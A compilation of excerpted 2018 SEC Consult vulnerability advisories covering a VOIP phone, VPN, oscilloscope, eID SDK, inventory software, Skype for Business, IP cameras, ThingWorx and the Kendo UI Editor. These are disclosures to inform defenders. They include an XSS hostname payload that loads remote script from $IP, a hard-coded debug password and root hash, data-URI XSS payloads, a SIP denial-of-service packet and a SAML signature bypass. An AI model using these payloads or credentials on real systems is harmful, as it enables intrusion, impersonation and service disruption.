lot of settings can be changed directly on the VOIP phone via the built-in screen. There are also multiple locations, where user-input is parsed and displayed. It was possible to inject arbitrary (JavaScript) code directly into the phone UI. As an example the hostname of the VOIP Phone can be changed to the following value: hostname“>http://$IP/sec.js onload=exec()> The sec.js gets loaded from the remote host immediately and the exec function is executed. < A screenshot can be found online on our website > Further analysis has not been performed, but depending on the underlying libraries/system in use, it might be possible to get system level access via this attack vector. 2) Hard coded and weak secrets The file at the following path contains a hard coded password for the user debug: /_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd $1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix)) This hash corresponds to the following clear-text password: debug The password for the user root and default is also stored in the /etc/passwd: nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default 3) Undocumented debug functionality The built-in VOIP phone web server offers multiple functionalities for the end-user. During a manual analysis, undocumented endpoints with critical functionality got identified. The functionality can be found by visiting the following endpoint:
SEC Consult SA-20181205-0 :: Inadequate cryptography implementation in Kerio Control VPN protocol
SEC Consult Vulnerability Lab Security Advisory < 20181205-0 > === title: Inadequate cryptography implementation product: Kerio Control VPN protocol vulnerable version: <=9.2.7 fixed version: 9.2.8 CVE number: - impact: High homepage: http://www.kerio.com/products/kerio-control found: 2018-10 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Protect your network from viruses, malware and malicious activity with Kerio Control, the easy-to-administer yet powerful all-in-one security solution. Kerio Control brings together next-generation firewall capabilities -- including a network firewall and router, intrusion detection and prevention (IPS), gateway anti-virus, VPN, and web content and application filtering. These comprehensive capabilities and unmatched deployment flexibility make Kerio Control the ideal choice for small and mid-sized businesses." "Link headquarters to remote users and branch offices securely and easily. Kerio’s own VPN tunneling with dead-simple setup requires minimal configuration, and provides a high performance network connection. Or, use industry-standard IPsec/L2TP for connectivity from mobile devices or third-party firewalls. Enable 2-step verification for an extra layer of security on all forms of remote access." Source: http://www.kerio.com/products/kerio-control Business recommendation: During a quick evaluation of the Kerio Control VPN protocol, it was apparent, that the cryptographic protocol employed exhibited severe design issues. Generally, SEC Consult strongly recommends to prefer well-established standard cryptographic protocols rather than proprietary protocols wherever possible (e.g. DTLS, IPsec). Due to their widespread use, they generally receive much greater attention by experts. Therefore, many design issues with these protocols have already been detected and mitigated since. We therefore recommend businesses to switch from Kerio's proprietary VPN protocol to a standard protocol (Kerio Control e.g. supports IPsec). Note that no full audit of Kerio Control, Kerio VPN or the cryptographic protocol has been conducted. In addition to the vulnerabilities described here, we already identified critical vulnerabilities in Kerio Control in 2016. Hence we suspect there are more major security deficiencies in the product. We therefore recommend GFI software to greatly increase the efforts towards product security in order to keep customers secure. We want to explicitly thank GFI for the professional handling of the communication during this whole process. Vulnerability overview/description: --- After a TLS connection is established between the Kerio VPN client and the Kerio Control appliance and cryptographic keys have been securely transferred over this connection, the data sent through the VPN is transmitted in UDP packets. Each of these packets is encrypted using Blowfish in CTR mode. As this mode does not provide data authenticity, encrypted data that is modified by an attacker results in predictable modification of the plaintext. More precisely, bits that are flipped in the ciphertext result in the same bits being flipped in the plaintext after decryption. Each encrypted UDP datagram contains a simple checksum (the same checksum used by IPv4). Assuming an attacker knows the plaintext data of a datagram and is able to modify its ciphertext, it is trivial to change parts of the message, e.g. inject content into the encrypted stream, while keeping the resulting checksum identical. Proof of concept: - SEC Consult provided a proof of concept exploit script to GFI but it has been removed from this advisory in order to give customers more time to upgrade the infrastructure. Vulnerable / tested versions: - The version 9.2.7 build 2921 was found to be vulnerable. This version was the latest at the time of discovery and older versions are affected as well. Vendor contact timeline: 2018-10-17: Creating support case at https://gfisoftware.force.com, asking for security contact 2018-10-17: GFI support: Asking to upload advisory to support portal 2018-10-19: Uploading advisory 2018-10-22: GFI support: Escalated to engineers to further investigate 2018-10-25: GFI support acknowledges vulnerability 2018-11-08: GFI support: Beta version with patch available (with AES 128) 2018-11-09: Asking for release date of the patch 2018-11-12: GF
SEC Consult SA-20181130-0 :: Multiple Vulnerabilities in Siglent Technologies SDS 1202X-E Digital Oscilloscope
SEC Consult Vulnerability Lab Security Advisory < 20181130-0 > === title: Multiple Vulnerabilities product: Siglent Technologies SDS 1202X-E Digital Oscilloscope vulnerable version: V5.1.3.13 fixed version: - CVE number: - impact: High homepage: http://siglenteu.com/ https://www.siglent.eu/ https://www.siglentamerica.com/ found: 2018-08-06 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "SIGLENT is an international high-tech company, concentrating on R, sales, production and services of measurement products. As an ISO9001:2000 International Quality Management System and ISO 14001:2004 Environmental Management System Certified company, SIGLENT is also a member of the China Electronic Instrument Industry Association and Guangdong Instrument Representative Association. [...] SIGLENT focuses on the electronic test & measurement instrument industry and sees research & development as a core competency, while keeping a strong competitive edge through technology innovation and strict quality control. Try a Siglent product. Then compare the performance and the features to any other model, any other brand. Then compare the price. We believe there is no better value anyplace." Source: http://www.siglenteu.com/about.aspx Business recommendation: The identified backdoor accounts are accessible through Telnet, hence a compromise of the device via a local network attack is possible. Any malicious modification of measurement values may have serious impact on the product or service which is created or offered by using this oscilloscope. Therefore, all procedures which are executed with this device are untrustworthy. SEC Consult recommends not to use this product within a network of a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. The vendor was unresponsive and did not provide a patch. Vulnerability overview/description: --- 1) Hardcoded Backdoor Accounts Two backdoor accounts are present on the system. A Telnet service is listening on port 23 which enables an attacker to connect as root to the oscilloscope via LAN. The password hashes are hardcoded and are difficult to change for the end user because the "shadow" file is stored on a cramfs (intentionally write-only) file system. 2) Missing Authentication / Design Issue The software "EasyScopeX" can be used from any computer in the network to configure and interact with the oscilloscope. This is possible without prior authentication which enables everyone to change settings on the oscilloscope. 3) Unencrypted Communication The software "EasyScopeX" communicates via unencrypted TCP packets with the client computer / oscilloscope. 4) Outdated and Vulnerable Software Components Multiple software components embedded in the firmware are outdated and found to be vulnerable to various publicly known security issues. Proof of concept: - 1) Hardcoded Backdoor Accounts The following password hashes were dumped from "/etc/shadow" by connecting to the UART interface on the PCB: root siglent (The password hashes have been removed from this advisory) 2) Missing Authentication / Design Issue It is sufficient to install the "EasyScopeX" software and control the oscilloscope without any authentication. 3) Unencrypted Communication The software "EasyScopeX" communicates in plaintext via various ports by using the portmapper. The default ports are "5024" and "5025". 4) Outdated and Vulnerable Software Components Using the IoT Inspector software we found the following outdated and vulnerable components: * BusyBox 1.20.1 * GNU glibc 2.13 * Linux Kernel 3.19.0 Vulnerable / tested versions: - The following device / firmware version has been tested: * Siglent SDS1202X-E (V5.1.3.13) It is assumed that other firmware versions are affected as well. Vendor contact timeline: 2018-08-22: Contacting German VDE CERT for coordination support 2018-09-04: Asking for a status update from the vendor 2018-09-05: VDE CERT: no response from vendor yet 2018-09-12: US sales person from Siglent has answered, VDE CERT is sending advisory to be forwarded to engineering 2018-10-10: Asking for a status update (affected versions, etc) 2018-10-10
SEC Consult SA-20181121-0 :: Signature Bypass / Authentication Bypass in Governikus Autent SDK
An additional blog post has been published on this topic as well: English version: https://r.sec-consult.com/governikus German version: https://r.sec-consult.com/gov SEC Consult Vulnerability Lab Security Advisory < 20181121-0 > === title: Signature Bypass / Authentication Bypass product: Governikus Autent SDK vulnerable version: <=3.8.1 fixed version: 3.8.1.2 CVE number: - impact: critical homepage: https://www.governikus.de/ found: 2018-06 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- German original, translated to English: "In the course of digitization, electronic identities have become indispensable. At the same time, the requirements for protection, handling with regard to legal security and the federation of electronic identities are increasing. With Governikus Autent, server and client components are available to ensure authentication through electronic identities. Governikus Autent meets all the requirements of a modern identity management solution.” Source: https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/ Business recommendation: During a short crash test SEC Consult identified a critical vulnerability in the Governikus Autent SDK nPA authentication code (German id card authentication). This vulnerability could allow an attacker to impersonate any German citizen on a vulnerable web application. SEC Consult recommends to immediately apply the workaround described below or apply the patch provided by the vendor. Moreover, SEC Consult recommends web application providers to check historic log files for evidence of this attack. SEC Consult recommends conducting a thorough source code security review on the Governikus Autent components as they are integral for the security of many web applications. Vulnerability overview/description: --- The software component tested is used by web applications to integrate nPA authentication (authentication using the German official id document). As the last step of an authentication transaction, the web application the user authenticates against receives a string containing all relevant data about the citizen (e.g. first name, last name). As this string is signed by a trusted party (an eID server), the application can verify the authenticity of this string. The component in the web application that is supposed to verify this signature can be tricked into accepting a string that has been modified. An attacker that has acquired a single legitimately signed string can use this to authenticate as any German citizen to any web application that trusts the eID server's signature. An attacker could acquire such a signed string by hosting a web application and tricking a victim to authenticate, by gaining access to a signed string sent to a legitimate web application (man-in-the-middle attack, getting access to the access log) or by authenticating against a web application using his own id document. Proof of concept: - 1. Signature Bypass During the last step of the NPA transaction, the user is redirected to the SAML receiver of the web application she tried to authenticate against. The SAML response is sent as a URL parameter: https:///?SAMLResponse==<...>== According to the demo application, the first verification a SAML receiver is meant to do is call the method HttpRedirectUtils.checkQueryString passing the query string (as it is returned by request.getQueryString()). If this method returns false, the signature could not be verified. This method internally deconstructs the query string into individual parameters, reconstructs the query string and then verifies the signature. If however, the query string contains multiple parameters of the same name, only the last occurrence of a parameter is built into the query string the signature is verified against. Therefore, if a query string is constructed like following, the first SAML response is ignored during signature verification: ...?SAMLResponse==... Afterwards, when the SAML response is processed, the application is likely to use the method ServletRequest.getParameter() to retrieve the SAML response (the demo application which is meant to show the integration of the library also does this). As per the specification of this method, the application server is supposed to return the first parameter value, if multiple parameters with the same name were sent. Thus, the signature is verified against t
SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 > === title: Multiple critical vulnerabilities product: Miss Marple Enterprise Edition vulnerable version: <2.0 fixed version: 2.0 CVE number: CVE-2018-19233, CVE-2018-19234 impact: Critical homepage: www.comparex-group.com found: 2018-05-29 by: Marius Schwarz (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "As a global IT company with thirty years of experience, COMPAREX is one of the world’s leading IT service providers and no. 1 software license management company in the EMEA markets. COMPAREX develops innovative services that support management and leverage software products, leading to an overall improvement of workforce productivity. COMPAREX serves corporate customers spanning from small businesses to large international corporations as well as the public institutions supporting every customer during their digital journey towards productivity optimization. The portfolio has a solid foundation in license management, software procurement and cloud services. Substantial professional and managed services complete the portfolio to support customers with services tailored to their business demands." Source: https://comparexusa.com/about-us/about/ Business recommendation: The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available. Vulnerability overview/description: --- Application overview: Miss Marple is an inventory software that consists of a client and a server part. The client (agent) is gathering system information and uploads the results to a remote server in an encrypted ZIP file. 1) Hardcoded AES key (CVE-2018-19233) A username and an encrypted password were identified in the Miss Marple Inventory Agent configuration file. By decompiling the binary, the encryption method was identified as AES-256 with a hardcoded key and initialization vector. The credentials are used to deploy the inventory files to a remote server. 2) Uploading arbitrary files There are two ways an attacker can upload arbitrary files to the server. 2.1) Patching the application binary to bypass the ZIP file extension check Using this method, it is possible to upload any file to the server, even if the credentials are unknown to the attacker! This works because every file in a specific directory gets uploaded, as long as the file has the correct file extension. This can be bypassed because the file extension is only checked on the client side and not on the server side. Patching the binary is done by replacing the extension string with the file extension of the attackers file eg. ".aspx" in the MMIA.exe binary itself. 2.2) Using cURL to upload arbitrary files If the credentials are known to the attacker, it is possible to use tools like cURL to upload arbitrary files to the remote server. Both ways can be used by an attacker to upload a web-shell to the server and execute arbitrary commands. 3) Missing update validation (CVE-2018-19234) Besides the Miss Marple Inventory Agent, an Miss Marple Updater Service is running on all clients. This service checks for new versions on the same server. If the files are uploaded to the right directory on the server, the updater will download and execute them with the highest privileges (NT Authority\SYSTEM) without validating the binaries. This can also be used for escalating privileges on the client. By uploading a web-shell using the methods described in vulnerability 2, an attacker gets sufficient write permissions to access the update directory and to place malicious files on the server. This will execute arbitrary code on all clients using Miss Marple. Proof of concept: - 1) Hardcoded AES key (CVE-2018-19233) No proof of concept will be provided. 2) Uploading arbitrary files 2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip" just has to be replaced with the file extension for the uploaded web-shell. 2.2) Using cURL to upload arbitrary files It is possible to upload arbitrary files using cURL and the credentials obtained in 1). 3) Missing update validation (CVE-2018-19234) No proof of concept will be provided. Vulnerable / tested versions: - The following versions have been tested and found to be vulnerable: Miss Marple Inventory Agent / Miss Marple Updater Service 1.13 Vendor contact timeline: 2018-06-
SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 > === title: Denial of Service product: Microsoft Skype for Business 2016 / Lync 2013 vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before v15.0.5075.1000 Skype for Business 2016: before v16.0.4756.1000 fixed version: Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000 Skype for Business 2016 v16.0.4756.1000 CVE number: CVE-2018-8546 impact: Medium homepage: https://www.skype.com/en/business/ found: 08/2018 by: Sabine Degen (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Skype for Business (formerly Microsoft Office Communicator and Microsoft Lync) is an instant messaging client used with Skype for Business Server or with Skype for Business Online (available with Microsoft Office 365). Skype for Business is enterprise software." Source: https://en.wikipedia.org/wiki/Skype_for_Business Business recommendation: Assess the impact of this vulnerability on your business. The patch provided by Microsoft should be installed immediately. Especially if Skype for Business is being used for external communication. Vulnerability overview/description: --- A large number of emojis (e.g. ~800 kittens) received in one message by the Skype For Business client freezes the program for a few seconds. This can be exploited to perform Denial of Service attacks against Skype for Business users and compromises the availability of the program. For example, an attacker can continuously send such messages to the chat window of a meeting room in order to freeze the program for all participants and prevent them from using the chat or seeing the video. Note that the sound and video stream is handled by a separate thread and therefore are not affected (e.g. killed), only the functions related to graphical user interface become unusable. Proof of concept: - After sending a big amount of emojis (~800 kittens) to a Skype for Business chat, the program freezes for a few seconds while rendering the chat window. Continuously sending emojis will make the GUI unusable for the user. Ongoing conference calls are not affected or interrupted. The following SIP packet illustrates the attack. MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0 Via: SIP/2.0/tls 127.0.0.1:7490 From: ;tag=82254700;epid=e67b0162bec8 To: ;tag=5c302cb624;epid=15347556e6 Max-Forwards: 70 CSeq: 12 MESSAGE User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0) Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x Route: Contact: Content-Type: text/plain; charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA Content-Length: 4420 Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*" (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...] Vulnerable / tested versions: - The following versions have been identified as vulnerable which were the latest versions available at the time of the test: * Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013 * Skype for Business 2016 MSO (16.0.93).64-Bit, Both versions were running on Windows 10 Pro. According to the vendor, all previous versions are affected: * Skype for Business 2015 (Lync 2013) before v15.0.5075.1000 * Skype for Business 2016: before v16.0.4756.1000 Vendor contact timeline: 2018-08-02: Vulnerability details submitted to Microsoft, MSRC Case 47060 assigned 2018-08-28: Asking for a status update 2018-08-30: Vendor: issue has been reproduced, solution to block the user provided 2018-08-31: Follow-up questions why DoS is not categorized as security issue as the provided workaround is not effective for attacks already in progress 2018-08-31: Vendor: decided to f
SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)
SEC Consult also published a blog post regarding the identified security issues with further background information: Blog: https://r.sec-consult.com/xmeye SEC Consult Vulnerability Lab Security Advisory < 20181009-0 > === title: Remote Code Execution via XMeye P2P Cloud product: Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices vulnerable version: see below fixed version: - CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919 impact: Critical homepage: http://www.xiongmaitech.com/en/ found: 2018-03-05 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance, Video intelligent research and development. We devote ourselves to providing good products, technical services for manufacturers, wholesaler and service provider, in order to offer better experience for our customers. We are global leading providers in security video products and technology. Established from 2009, many years development, the headquarter of XM locate in Yinhu Innovation Center, Fuyang district, Hangzhou now. Total registered capital reach to 60 million. Now we owns nearly 2000 employees including a strong R team (more than 300 experienced engineers)." Source: http://www.xiongmaitech.com/en/index.php/about/company/18 Business recommendation: SEC Consult has identified highly critical vulnerabilities in Xiongmai products and the "XMeye P2P Cloud" feature which is being used in many 3rd party OEM devices as well. The vendor does not provide proper mitigations and hence it is recommended not to use any products associated with the XMeye P2P Cloud until all of the identified security issues have been fixed and a thorough security analysis has been performed by professionals. Vulnerability overview/description: --- 1) Predictable XMEye Cloud IDs (CVE-2018-17915) All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a proprietary, UDP-based protocol that allows users to access their IP cameras or NVRs/DVRs via the internet. The feature is enabled by default, no setup by the user is required. The device initiates and keeps a connection to a Xiongmai cloud server. All connections between clients and the devices are established via Xiongmai cloud servers. This approach allows users to connect to devices that are behind firewalls, NATed etc. The unique, per-device identifier is the cloud ID. It is a 16 character long hexadecimal string (e.g. f7e708f21de0fde0). Anyone who knows the device identifier and the admin credentials can establish a connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop application. The Cloud ID may be unique, but it is not random. It is derived (at boot time) from the device MAC address using a few simple operations (see get_sn_from_mac()) below. An attacker can enumerate potential MACs/cloud IDs and find valid ones. Then use the weak default credentials to log in. This allows the attacker to watch the video feed, change the device configuration and possibly gain remote code execution using other vulnerabilities. The XMEye functionality allows an attacker to attack devices that are behind firewalls, NATed networks etc. MAC addresses have a well defined structure: 3-octet OUI (Vendor) + 3-octet NIC ID OUIs are assigned by the IEEE. Interestingly Xiongmai does not own an OUI, but instead uses the OUIs of other companies. The following OUIs are used by Xiongmai devices (OUIs based on internet research, scanning, company names based on [1]): 001210 WideRay Corp 001211 Protechna Herbst GmbH & Co. KG 001212 PLUS Corporation 001213 Metrohm AG 001214 Koenig & Bauer AG 001215 iStor Networks, Inc. 001216 ICP Internet Communication Payment AG 001217 Cisco-Linksys, LLC 001218 ARUZE Corporation 003E0B - Not assigned We developed a cloud ID scanner that queries the Xiongmai cloud server. The responses indicate if there is a device online that uses the given cloud ID, plus provide the IP of a Xiongmai Cloud hop server that is geographically close to the device. One query is one UDP packet. We scanned 0.02% of the devices (random choice) in each OUI range (16 Million devices per range) and extrapolated the results. OUI: 001210; IDs checked 3,365; Devices online 3; Success rate: 0.1%; extrapolated devices online: 14,957 OUI: 001211; IDs checked 3,363; Devices online 9; Success rate:
SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 > === title: Password disclosure vulnerability & XSS product: PTC ThingWorx vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x fixed version: see Solution section CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218 impact: critical homepage: https://www.ptc.com found: 2018-03-13 by: M. Tomaselli (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ThingWorx is more than an IoT platform; it provides the functionality, flexibility and scalability that businesses need to drive industrial innovation─including the ability to source, contextualize and synthesize data while orchestrating processes and delivering powerful web, mobile and AR experiences." Source: https://www.ptc.com/en/thingworx8 Business recommendation: ThingWorx allows to configure Things to communicate with other services over several protocols (e.g. LDAP integration via a DirectoryServices Thing). In order to communicate with services that require authentification, ThingWorx provides functionality to associate credentials to a Thing. During a brief audit it was noticed that ThingWorx Composer leaks the following sensitive data: 1) The PBKDF2WithHmac512 password hash of a user Thing 2) The AES encrypted password of several Things containing password attributes Furthermore, the password used for encryption is hard-coded and thus identical along all installations. Besides the above mentioned vulnerabilities a reflected cross-site scripting vulnerability was identified in the ThingWorx SQUEAL search function. The vendor provides a patch which should be installed immediately. It is recommended to perform further thorough security audits as the product may be affected by other potential security vulnerabilities. Vulnerability overview/description: --- 1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216) ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application users when doing exports with an administrative account. This enables an attacker to conduct offline brute-force or dictionary attacks against the obtained password hashes. 2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords (CVE-2018-17217) A critical information disclosure vulnerability leaks the AES encrypted passwords of services configured within ThingWorx. Due to a hard-coded master password in the SecureData class, an attacker is able to decrypt the obtained passwords which grants him access to other services. The AES encrypted password gets disclosed in the server response when a user/attacker visits a Thing that contains credentials. 3) Reflected Cross-Site Scripting (CVE-2018-17218) The JavaScript part of the ThingWorx SQUEAL search functionality (searchExpression parameter) which is responsible for parsing the obtained JSON response fails to properly sanitize user supplied input. If the victim views attacker-prepared content (e.g. on a website or in an HTML email) an attacker is able to execute arbitrary actions in the context of its victims' sessions. Proof of concept: - The proof of concept has been removed from this advisory. Vulnerable / tested versions: - The vulnerabilities have been verified to exist in version 8.0.1-b39 which was the latest version available at the time of the test. The vendor provided further affected version information. See the Solution section for reference. Vendor contact timeline: 2018-03-14: Contacting vendor through email 2018-03-16: Advisory sent to vendor via encrypted mail 2018-03 - 2018-09: Multiple phone calls with PTC R department discussing release & multi-party disclosure 2018-08-15: Vendor provided private notifications to customers to give 45 days to upgrade 2018-10-01: Coordinated release of SEC Consult advisory Solution: - Best recommendation is to upgrade to the latest version of ThingWorx to version 8.3.2 (at time of writing). For newer verions, the issue of the hard coded password has been fixed and the SQUEAL function removed. The minimum upgrade to obtain mitigations for all 3 issues depends on the version of ThingWorx in use. For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+ For ThingWorx version 8.0.x, upgrade to 8.0.12+ For ThingWorx version 8.1.x, upgrade to 8.1.7+ For ThingWorx version 8.2.x, upgrade to 8.2.4+ The vendor always recommends upgradin
SEC Consult SA-20180926-0 ::
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 > === title: Stored Cross-Site Scripting product: Progress Kendo UI Editor vulnerable version: v2018.1.221 fixed version: none, see workaround CVE number: CVE-2018-14037 impact: medium homepage: https://www.progress.com/kendo-ui found: 2018-04-23 by: M. Tomaselli (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "The Editor allows users to create rich text content by means of a WYSIWYG interface. This HTML5 widget outputs identical HTML across all major browsers, follows accessibility standards and provides an API for content manipulation. The generated widget value is comprised of XHTML markup." https://www.telerik.com/kendo-ui/editor Business recommendation: SEC Consult recommends to implement the workarounds provided by the vendor. Vulnerability overview/description: --- The demo application of the Kendo UI Editor which is hosted at https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function which should protect from cross site scripting. However, the implemented Sanitizer fails to catch certain payloads which allow an attacker to execute JavaScript in the context of the editor itself. Proof of concept: - The following, incomplete list, of payloads can be used to trigger an alert box in the API demo application of the Kendo UI Editor: https://demos.telerik.com/kendo-ui/editor/api After a click on the button the setValue function on line 513 of the beautified "api.js" is called: var setValue = function () { editor.value($("#value").val()); }; The value function is implemented in line 64383 of the beautified "kendo.all.js" file and defined as: value: function (html) { var body = this.body, editorNS = kendo.ui.editor, options = this.options, currentHtml = editorNS.Serializer.domToXhtml(body, options.serialization); if (html === undefined) { return currentHtml; } if (html == currentHtml) { return; } editorNS.Serializer.htmlToDom(html, body, options.deserialization); this.selectionRestorePoint = null; this.update(); this.toolbar.refreshTools(); }, In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom() function is called which can be seen in the excerpt below: var Serializer = { toEditableHtml: function (html) { return (html || '').replace(//g, '').replace(/<(\/?)script([^>]*)>/gi, '<$1k:script$2>').replace(/]*)>/gi, function (match) { return match.replace(onerrorRe, ''); }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi, '$1').replace(/^<(table|blockquote)/i, br + '<$1').replace(/^[\s]*(|\u00a0)/i, '$1').replace(/<\/(table|blockquote)>$/i, '' + br); }, Although certain payloads are detected and sanitized by the function, the implemented protection fails to detect the data uri payload. The payload is added unescaped to the editor DOM after several other functions calls. Vulnerable / tested versions: - The following version has been identified to be vulnerable: * v2018.1.221 Vendor contact timeline: 2018-05-02: Contacting vendor through email for security contact 2018-05-02: Contact person requests to obtain advisory via unencrypted mail 2018-05-08: Advisory delivered through unencrypted email to vendor 2018-05-29: Contacting vendor for current status and informing them about the publishing date 2018-07-02: Reminded the vendor that the advisory will be published soon 2018-07-02: Multiple emails exchanged, vendor demands that customers need to issue a support ticket on this case 2018-07-03: Telling them that it is a security issue they already know two months without seemingly acting upon it. Vendor: product managers have been informed and will contact us; no further info 2018-07-11: Asking vendor again for a status update & patch information 2018-07-11: Vendor: "Thank you for following up. I have sent this to the product team to take into consideration. They will be following up with you as they may need. We appreciate you following up regarding this request." 2018-07-12: Detailed answer from vendor regarding workaround 2018-07-13: Requested CVE num
Re: SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor
here with correct email subject :) On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20180926-0 > > === > title: Stored Cross-Site Scripting > product: Progress Kendo UI Editor > vulnerable version: v2018.1.221 > fixed version: none, see workaround > CVE number: CVE-2018-14037 > impact: medium >homepage: https://www.progress.com/kendo-ui > found: 2018-04-23 > by: M. Tomaselli (Office Munich) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "The Editor allows users to create rich text content by means of a WYSIWYG > interface. This HTML5 widget outputs identical HTML across all major browsers, > follows accessibility standards and provides an API for content manipulation. > The generated widget value is comprised of XHTML markup." > > https://www.telerik.com/kendo-ui/editor > > > Business recommendation: > > SEC Consult recommends to implement the workarounds provided by the vendor. > > > Vulnerability overview/description: > --- > The demo application of the Kendo UI Editor which is hosted at > https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function > which should protect from cross site scripting. However, the implemented > Sanitizer fails to catch certain payloads which allow an attacker to execute > JavaScript in the context of the editor itself. > > > Proof of concept: > - > The following, incomplete list, of payloads can be used to trigger an alert > box in the API demo application of the Kendo UI Editor: > https://demos.telerik.com/kendo-ui/editor/api > > > data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+"> > > HTTP-EQUIV="refresh" > CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> > > > > After a click on the button the setValue function on line 513 of the > beautified > "api.js" is called: > > var setValue = function () { > editor.value($("#value").val()); > }; > > > The value function is implemented in line 64383 of the beautified > "kendo.all.js" > file and defined as: > > value: function (html) { > var body = this.body, editorNS = kendo.ui.editor, options = > this.options, currentHtml = editorNS.Serializer.domToXhtml(body, > options.serialization); > if (html === undefined) { > return currentHtml; > } > if (html == currentHtml) { > return; > } > editorNS.Serializer.htmlToDom(html, body, > options.deserialization); > this.selectionRestorePoint = null; > this.update(); > this.toolbar.refreshTools(); > }, > > In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom() > function is called which can be seen in the excerpt below: > > var Serializer = { > toEditableHtml: function (html) { > return (html || '').replace(//g, > '').replace(/<(\/?)script([^>]*)>/gi, > '<$1k:script$2>').replace(/]*)>/gi, function (match) { > return match.replace(onerrorRe, ''); > }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi, > '$1').replace(/^<(table|blockquote)/i, br + > '<$1').replace(/^[\s]*(|\u00a0)/i, > '$1').replace(/<\/(table|blockquote)>$/i, > '' + br); > }, > > Although certain payloads are detected and sanitized by the function, the > implemented protection fails to detect the data uri payload. The payload is > added unescaped to the editor DOM after several other functions calls. > > > Vulnerable / tested versions: > - > The following version has been identified to be vulnerable: > * v2018.1.221 > > > Vendor contact timeline: > > 2018-05-02: Contacting vendor through email for security contact > 2018-05-02: Contact person requests to obtain advisory via unencrypted mail > 2018-05-08: Advisory delivered through unencrypted email to vendor > 2018-05-29: Contacting vendor for curren
